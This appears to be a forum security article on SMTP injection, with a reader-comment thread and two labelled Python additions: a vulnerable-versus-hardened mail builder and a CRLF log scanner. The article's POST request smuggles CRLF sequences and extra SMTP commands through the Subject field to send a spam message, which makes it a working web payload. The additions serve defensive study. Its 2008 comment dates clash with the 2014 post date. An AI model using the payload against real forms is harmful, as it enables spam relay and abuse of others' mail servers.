Saturday, April 19, 2014
SMTP injection

About injection of commands into SMTP

I haven't done anything in a while, and I didn't find this here, so I figured I'd write an article on it. Here you go.

There are cases where an application performs the SMTP conversation itself, or passes user-supplied input to a different component that does so. In this situation, it may be possible to inject arbitrary SMTP commands directly into that conversation, potentially taking full control of the messages the application generates.

For example, consider an application that uses requests of the following form to submit site feedback:

POST /feedback.php HTTP/1.1
Host: site.com
Content-Length: 56

From=me@mail.com&Subject=Site+feedback&message=hello


This causes the web application to perform an SMTP conversation with the following commands:

MAIL FROM: me@mail.com
RCPT TO: feedback@site.com
DATA
From: me@mail.com
To: feedback@site.com
Subject: site feedback
hello
.


NOTE: After the SMTP client issues the DATA command, it sends the contents of the email message, comprising the message headers and body, and then sends a single dot character on a line of its own. This tells the server that the message is complete, and the client can then issue further SMTP commands to send further messages.

In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:

POST /feedback.php HTTP/1.1
Host: site.com
Content-Length: 240

From=me@mail.com&Subject=Site+feedback%0d%0ahello%0d%0a%2e%0d%0aMAIL+FROM:+person@mail.com%0d%0aRCPT+TO:+john@mail.com%0d%0aDATA%0d%0aFROM:+person@mail.com%0d%0aTO:+john@mail.com%0d%0aSubject:+Cheap+viagra%0d%0aBlah%0d%0a%2e%0d%0a&message=foo

If the application is vulnerable, this results in the following SMTP conversation, which produces two different email messages, the second of which is entirely within your control:

MAIL FROM: me@mail.com
RCPT TO: feedback@site.com
DATA
From: me@mail.com
To: feedback@site.com
Subject: site feedback
hello
.
MAIL FROM: person@mail.com
RCPT TO: john@mail.com
DATA
From: person@mail.com
To: john@mail.com
Subject: Cheap Viagra
Blah
.
foo
.
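To make the conversation above concrete, here is an added example in Python; it is not code from the article or from any real application. It puts a deliberately naive SMTP message builder, which pastes the form fields straight into the client's stream, beside a hardened one that rejects CR or LF in header-bound fields, requires a single mailbox address in From, and dot-stuffs the message body. The request bodies (the article's two requests plus a body-only variant), the fixed recipient feedback@site.com and every function name are constructed for this example. Counting lines that consist of a lone dot shows the effect: the benign request yields one DATA terminator, the injected one yields three.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request bodies, modelled on the article's two requests.
BENIGN_BODY = "From=me@mail.com&Subject=Site+feedback&message=hello"
INJECTED_BODY = (
    "From=me@mail.com&Subject=Site+feedback%0d%0ahello%0d%0a%2e%0d%0a"
    "MAIL+FROM:+person@mail.com%0d%0aRCPT+TO:+john@mail.com%0d%0aDATA%0d%0a"
    "FROM:+person@mail.com%0d%0aTO:+john@mail.com%0d%0aSubject:+Cheap+viagra"
    "%0d%0aBlah%0d%0a%2e%0d%0a&message=foo"
)
# Body-only variant: the headers are clean, but the message text carries a lone '.' line.
BODY_DOT_BODY = "From=me@mail.com&Subject=hi&message=hello%0d%0a%2e%0d%0aMAIL+FROM:+x@mail.com"

FEEDBACK_ADDR = "feedback@site.com"  # assumed fixed recipient, as in the article


def parse_form(body):
    """URL-decode the form body into a flat dict (first value per field)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def build_smtp_vulnerable(form):
    """Pastes form values straight into the SMTP stream. A value containing CRLF
    can end the DATA section early and smuggle in further SMTP commands."""
    lines = [
        f"MAIL FROM: {form['From']}",
        f"RCPT TO: {FEEDBACK_ADDR}",
        "DATA",
        f"From: {form['From']}",
        f"To: {FEEDBACK_ADDR}",
        f"Subject: {form['Subject']}",
        "",
        form["message"],
        ".",
    ]
    return "\r\n".join(lines) + "\r\n"


def count_messages(smtp_stream):
    """Number of DATA terminators (a '.' alone on a line) in the client's stream:
    one for a well-formed single message, more if injection succeeded."""
    return sum(1 for line in smtp_stream.split("\r\n") if line == ".")


class HeaderInjection(ValueError):
    """Raised when a form field would break the SMTP conversation."""


CRLF_RE = re.compile(r"[\r\n]")
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def build_smtp_hardened(form):
    """Rejects CR/LF in header-bound fields, requires a plain mailbox address in
    From, and dot-stuffs the body (RFC 5321 section 4.5.2) so that a body line
    consisting of '.' can never terminate DATA."""
    for name in ("From", "Subject"):
        if CRLF_RE.search(form[name]):
            raise HeaderInjection(f"CR/LF in header field {name!r}")
    if not ADDR_RE.match(form["From"]):
        raise HeaderInjection("From is not a single mailbox address")
    body = form["message"].replace("\r\n", "\n").replace("\r", "\n")
    body_lines = ["." + ln if ln.startswith(".") else ln for ln in body.split("\n")]
    lines = [
        f"MAIL FROM:<{form['From']}>",
        f"RCPT TO:<{FEEDBACK_ADDR}>",
        "DATA",
        f"From: {form['From']}",
        f"To: {FEEDBACK_ADDR}",
        f"Subject: {form['Subject']}",
        "",
        *body_lines,
        ".",
    ]
    return "\r\n".join(lines) + "\r\n"


def hardened_rejects(body):
    """True if the hardened builder refuses the request body outright."""
    try:
        build_smtp_hardened(parse_form(body))
    except HeaderInjection:
        return True
    return False


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("injected", INJECTED_BODY), ("body-dot", BODY_DOT_BODY)):
        form = parse_form(body)
        naive = count_messages(build_smtp_vulnerable(form))
        hard = "rejected" if hardened_rejects(body) else f"{count_messages(build_smtp_hardened(form))} message(s)"
        print(f"{label}: naive builder emits {naive} message(s); hardened builder: {hard}")
```

The body-only variant is the reason the hardened builder dot-stuffs rather than just filtering headers: a multi-line message is legitimate, so the body is allowed to contain newlines, but a line that is exactly "." must be escaped to ".." or the mail server treats it as the end of the message.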


Finding SMTP injection flaws:

To probe an application's mail functionality effectively, you need to target every parameter that is submitted to an email-related function, even those that may initially appear to be unrelated to the content of the generated message.

You should also test for each kind of attack, and you should perform each test case using both Windows-style (CRLF) and Unix-style (LF) newline characters.
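As a defender-side complement to the probing advice above, here is an added example in Python that is not part of the article: a scanner over request-log lines that percent-decodes each form parameter (repeatedly, since some front ends decode a value more than once) and flags a CR, LF or CRLF in any header-bound parameter, which covers both the Windows- and Unix-style newlines mentioned above, as well as a bare "." line inside the message body parameter. The log format, the sample lines, the client addresses and the set of header-bound parameter names are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed request log (timestamp, client, path, raw POST body); not from the article.
SAMPLE_LOG = """\
2008-12-28T01:45:10Z 203.0.113.7 /feedback.php From=me@mail.com&Subject=Site+feedback&message=hello
2008-12-28T01:46:02Z 203.0.113.9 /feedback.php From=me@mail.com&Subject=hi%0d%0a%2e%0d%0aMAIL+FROM:+x@mail.com&message=x
2008-12-28T01:46:40Z 203.0.113.9 /feedback.php From=me@mail.com&Subject=hi%0a%2e%0aRCPT+TO:+y@mail.com&message=x
2008-12-28T01:47:13Z 203.0.113.9 /feedback.php From=me@mail.com&Subject=hi%250d%250aDATA&message=x
2008-12-28T01:48:00Z 203.0.113.12 /contact.php name=Bob&Subject=Order+%2312&message=Line+one%0d%0aLine+two
2008-12-28T01:49:31Z 203.0.113.9 /feedback.php From=me@mail.com&Subject=hi&message=hello%0d%0a%2e%0d%0aMAIL+FROM:+x@mail.com
"""

# Parameters whose values end up on a header line of the generated message (assumed set).
HEADER_PARAMS = {"from", "to", "cc", "bcc", "reply-to", "subject"}
NEWLINE_RE = re.compile(r"\r\n|\r|\n")


def decode_layers(raw, max_layers=3):
    """Percent-decode repeatedly, because some stacks decode a value more than once.
    Returns (decoded_value, depth): depth is the number of decodes needed before a
    CR or LF appears, or 0 if none appears within max_layers decodes."""
    current = raw
    for depth in range(1, max_layers + 1):
        decoded = unquote_plus(current)
        if "\r" in decoded or "\n" in decoded:
            return decoded, depth
        if decoded == current:
            break
        current = decoded
    return current, 0


def newline_style(value):
    """Name the newline convention found in a decoded value."""
    if "\r\n" in value:
        return "CRLF"
    return "CR" if "\r" in value else "LF"


def scan_body(body):
    """Return (param, reason) findings for one URL-encoded form body."""
    findings = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value, depth = decode_layers(raw)
        if depth == 0:
            continue
        if name.lower() in HEADER_PARAMS:
            findings.append((name, f"{newline_style(value)} in header field (decode depth {depth})"))
        elif "." in NEWLINE_RE.split(value):
            # Newlines in the body are legitimate; a line that is exactly '.' is not.
            findings.append((name, f"bare '.' line in message body (decode depth {depth})"))
    return findings


def scan_log(text):
    """Run scan_body over every log line; one alert dict per finding."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, path, body = line.split(" ", 3)
        for param, reason in scan_body(body):
            alerts.append({"ts": ts, "client": client, "path": path, "param": param, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['client']} {a['path']} param={a['param']}: {a['reason']}")
```

Of the six constructed lines, four produce alerts: a CRLF and an LF injection into Subject, a double-encoded (%250d%250a) injection that only shows up at decode depth 2, and a body parameter carrying a lone "." line. The multi-line contact message on the fifth line is left alone, since newlines in the body are normal; it is the header fields and the DATA terminator that matter.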

I hope you liked it, I'm working on more as we speak.

Comments

Zephyr_Pure on December 28 2008 - 01:45:10
I didn't approve this article because: (1) The content is very light and lofty and, (2) I feel like I've seen it before. While you illustrate a single technique, you don't explain it well enough to even make this a single-focus article. I should've just disapproved this heap of shit when I had the chance.
Zephyr_Pure on December 28 2008 - 02:29:22
The problem is that people care less, submit less, and ultimately pieces of shit like this seem to make it through the cracks. We need quality members, quality content, and at least halfway give-a-shit-itude. I'm just going to start disapproving anything that looks halfway questionable, since some people seem incapable of disapproving shit when they see it in the submissions.
korg on December 28 2008 - 03:26:59
Old, outdated and bullshit. Anyone running this is an ass! SMTP exploits have changed, my dear. Grammar and punctuation suck bad. Sorry! -10/10
fallingmidget on December 28 2008 - 22:40:17
So this and the other article are crap and disclose obvious things, whereas "how not to annoy others" is very good and in no way discloses the obvious. It feels like there are some biased people here.
Zephyr_Pure on December 29 2008 - 12:40:50
No, you're just hoping that there are biased people here so that you can defend your choice to write an article solely about one "trick" (email header injection using carriage returns and new lines). Since you chose to bring up that particular article, I'll bite... I approved it (for laughs) and commented on it stating that it couldn't possibly get an "Awesome". Now, why did it get the positive reviews that it did? The purpose of his article was a valid one and was expressed using: (1) Good grammar technique, (2) Good structure of thoughts and supporting details, and (3) Depth of concepts and logic. Take out the quote blocks in your article here and look at the amount of text you actually wrote. Read it and pay attention to the depth (or lack thereof). You gave the "how not to annoy others" article a Good rating... What would you give yours here?
fallingmidget on December 29 2008 - 12:52:39
I rated mine average because I see what you mean. I could have gone more in depth about it and perhaps broadened the scope of the article to other uses of this trick.
richohealey on January 01 2009 - 08:39:09
Also explain that your % escapes rely totally on the HTTP layer actually converting them to their ASCII equivalents; some don't.
Bejker on January 10 2009 - 15:38:27
I can't understand why other "smart asses" are acting like jerks. It's not the best, but show some respect because s/he spent some time writing this. I also don't know English well (so what?), but I know how every bit works in my PC. Your replies are annoying... Writing for such "nice" people is a waste of time! "You didn't even explain what %0d%0a is/does..." Let's open hellboundpedia... Good for exert...
Nubilosus on January 17 2009 - 19:55:05
www.acc3ssdenied.com/delete.JPG <- Here you go (sorry, bored)